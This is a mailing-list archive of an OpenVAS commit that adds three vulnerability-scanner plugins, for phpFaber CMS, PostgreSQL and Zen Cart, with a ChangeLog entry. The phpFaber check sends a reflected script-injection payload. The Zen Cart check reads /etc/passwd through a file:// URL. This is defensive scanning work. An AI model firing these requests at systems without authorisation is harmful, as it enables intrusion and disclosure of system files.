[Openvas-commits] r6146 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Wed Dec 16 12:39:09 CET 2009


Author: mime
Date: 2009-12-16 12:39:06 +0100 (Wed, 16 Dec 2009)
New Revision: 6146

Added:
   trunk/openvas-plugins/scripts/phpFaber_cms_37329.nasl
   trunk/openvas-plugins/scripts/postgressql_37334.nasl
   trunk/openvas-plugins/scripts/zen_cart_37283.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/cve_current.txt
Log:
Added new plugins

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2009-12-16 07:50:25 UTC (rev 6145)
+++ trunk/openvas-plugins/ChangeLog	2009-12-16 11:39:06 UTC (rev 6146)
@@ -1,3 +1,10 @@
+2009-12-16 Michael Meyer <michael.meyer at intevation.de>
+
+	* scripts/phpFaber_cms_37329.nasl,
+	scripts/postgressql_37334.nasl,
+	scripts/zen_cart_37283.nasl:
+	Added new plugins.
+
 2009-12-15 Michael Meyer <michael.meyer at intevation.de>
 
 	* scripts/phpldapadmin_37327.nasl,

Modified: trunk/openvas-plugins/cve_current.txt
===================================================================
--- trunk/openvas-plugins/cve_current.txt	2009-12-16 07:50:25 UTC (rev 6145)
+++ trunk/openvas-plugins/cve_current.txt	2009-12-16 11:39:06 UTC (rev 6146)
@@ -381,3 +381,7 @@
 CVE-2009-3563			Greenbone	svn		R
 37292				Greenbone	svn		R	
 37307				Greenbone	svn		R
+37329				Greenbone	svn		R
+CVE-2009-4034			Greenbone	svn		R
+CVE-2009-4136			Greenbone	svn		R
+37283				Greenbone	svn		R

Added: trunk/openvas-plugins/scripts/phpFaber_cms_37329.nasl
===================================================================
--- trunk/openvas-plugins/scripts/phpFaber_cms_37329.nasl	2009-12-16 07:50:25 UTC (rev 6145)
+++ trunk/openvas-plugins/scripts/phpFaber_cms_37329.nasl	2009-12-16 11:39:06 UTC (rev 6146)
@@ -0,0 +1,88 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# phpFaber CMS 'module.php' Cross Site Scripting Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100401);
+ script_bugtraq_id(37329);
+ script_version ("1.0-$Revision$");
+
+ script_name("phpFaber CMS 'module.php' Cross Site Scripting Vulnerability");
+
+desc = "Overview:
+phpFaber CMS is prone to a cross-site scripting vulnerability because
+it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code
+in the browser of an unsuspecting user in the context of the affected
+site. This may allow the attacker to steal cookie-based authentication
+credentials and to launch other attacks.
+
+References:
+http://www.securityfocus.com/bid/37329
+http://www.phpfaber.com/i/products/cms/
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if phpFaber CMS is prone to a cross-site scripting vulnerability");
+ script_category(ACT_GATHER_INFO);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/","/cms",cgi_dirs());
+
+foreach dir (dirs) {
+   
+  url = string(dir, "/module.php?mod=<script>alert(8154711)</script>"); 
+  req = http_get(item:url, port:port);
+
+  buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);  
+  if( buf == NULL )continue;
+
+  if(egrep(pattern: "<code>Module '<script>alert(8154711)</script>' not found</code>", string: buf, icase: TRUE)) {
+     
+    security_warning(port:port);
+    exit(0);
+
+  }
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/phpFaber_cms_37329.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/postgressql_37334.nasl
===================================================================
--- trunk/openvas-plugins/scripts/postgressql_37334.nasl	2009-12-16 07:50:25 UTC (rev 6145)
+++ trunk/openvas-plugins/scripts/postgressql_37334.nasl	2009-12-16 11:39:06 UTC (rev 6146)
@@ -0,0 +1,96 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100400);
+ script_bugtraq_id(37334,37333);
+ script_cve_id("CVE-2009-4034","CVE-2009-4136");
+ script_version ("1.0-$Revision$");
+
+ script_name("PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability");
+
+desc = "Overview:
+PostgreSQL is prone to a security-bypass vulnerability because the
+application fails to properly validate the domain name in a signed CA
+certificate, allowing attackers to substitute malicious SSL
+certificates for trusted ones.
+
+Successfully exploiting this issue allows attackers to perform man-in-the-
+middle attacks or impersonate trusted servers, which will aid in
+further attacks.
+
+PostgreSQL is also prone to a local privilege-escalation vulnerability.
+Exploiting this issue allows local attackers to gain elevated
+privileges.
+
+PostgreSQL versions prior to 8.4.2, 8.3.9, 8.2.15, 8.1.19, 8.0.23, and
+7.4.27 are vulnerable to this issue.
+
+Solution:
+Updates are available. Please see the references for more information.
+
+References:
+http://www.securityfocus.com/bid/37334
+http://www.securityfocus.com/bid/37333
+http://www.postgresql.org
+http://www.postgresql.org/support/security
+http://www.postgresql.org/about/news.1170
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if PostgreSQL is prone to a security-bypass and to a local privilege-escalation vulnerability");
+ script_category(ACT_GATHER_INFO);
+ script_family("Databases");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_dependencie("postgresql_detect.nasl");
+ script_require_ports("Services/postgresql", 5432);
+ exit(0);
+}
+
+include("version_func.inc");
+include("misc_func.inc");
+
+port = get_kb_item("Services/postgresql");
+if(!port)port = 5432;
+if(!get_tcp_port_state(port))exit(0);
+
+if(!ver = get_kb_list(string("PostgreSQL/Remote/", port, "/Ver")))exit(0);
+
+if(version_in_range(version:ver, test_version:"8.4", test_version2:"8.4.1")  ||
+   version_in_range(version:ver, test_version:"8.3", test_version2:"8.3.8")  ||
+   version_in_range(version:ver, test_version:"8.2", test_version2:"8.2.14") ||
+   version_in_range(version:ver, test_version:"8.1", test_version2:"8.1.18") ||
+   version_in_range(version:ver, test_version:"8.0", test_version2:"8.0.22") ||
+   version_in_range(version:ver, test_version:"7.4", test_version2:"7.4.26")) {
+
+    security_warning(port:port);
+    exit(0);
+}
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/postgressql_37334.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/zen_cart_37283.nasl
===================================================================
--- trunk/openvas-plugins/scripts/zen_cart_37283.nasl	2009-12-16 07:50:25 UTC (rev 6145)
+++ trunk/openvas-plugins/scripts/zen_cart_37283.nasl	2009-12-16 11:39:06 UTC (rev 6146)
@@ -0,0 +1,88 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Zen Cart 'extras/curltest.php' Information Disclosure Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100402);
+ script_bugtraq_id(37283);
+ script_version ("1.0-$Revision$");
+
+ script_name("Zen Cart 'extras/curltest.php' Information Disclosure Vulnerability");
+
+desc = "Overview:
+Zen Cart is prone to an information-disclosure vulnerability because
+it fails to sufficiently sanitize user-supplied data.
+
+An attacker can exploit this issue to view local files in the context
+of the webserver process. This may allow the attacker to obtain
+sensitive information; other attacks are also possible.
+
+References:
+http://www.securityfocus.com/bid/37283
+http://www.acunetix.com/blog/websecuritynews/acusensor-curl-and-zen-cart/
+http://www.zen-cart.com/forum/showthread.php?t=142784
+http://www.zen-cart.com/
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if Zen Cart is prone to an information-disclosure vulnerability");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/zen-cart","/zencart","/cart",cgi_dirs());
+
+foreach dir (dirs) {
+   
+  url = string(dir, "/extras/curltest.php?url=file:///etc/passwd"); 
+  req = http_get(item:url, port:port);
+  buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);  
+  if( buf == NULL )continue;
+
+  if(egrep(pattern: "root:.*:0:[01]:", string: buf, icase: TRUE)) {
+     
+    security_warning(port:port);
+    exit(0);
+
+  }
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/zen_cart_37283.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision



More information about the Openvas-commits mailing list